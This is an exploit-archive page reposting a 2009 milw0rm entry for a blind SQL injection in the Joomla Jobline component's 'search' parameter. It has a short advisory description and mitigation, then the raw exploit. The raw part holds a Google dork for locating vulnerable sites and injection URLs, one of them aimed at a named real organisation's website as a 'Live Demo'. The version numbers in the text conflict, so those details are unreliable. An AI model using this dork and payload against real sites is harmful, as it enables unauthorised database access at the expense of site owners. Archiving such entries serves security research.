Joomla Component: Jobline - exploit.company

vendor:

Jobline

by:

ManhLuat93

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Jobline

Affected Version From: 1.1.3.1

Affected Version To: 1.1.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:olle_johansson:jobline

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in Joomla Component Jobline version 1.1.3.1 and earlier. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input in the 'search' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to the database and execution of arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of Joomla Component Jobline or apply the patch from the vendor.

Source

Exploit-DB raw data:

##################################################
# Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability
# Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip
# Dork: inurl:"index.php?option=com_jobline"
#  ---> magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################

Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=

[-] Exploit [+]

[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='

[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='


note:
<name>Jobline</name>
<creationDate>08 Jan 2008</creationDate>
<version>1.3.1</version>
<joomlaVersion>1.5</joomlaVersion>
<copyright>(c) 2006 Olle Johansson</copyright>
<license>GNU GPL</license>


# milw0rm.com [2009-07-17]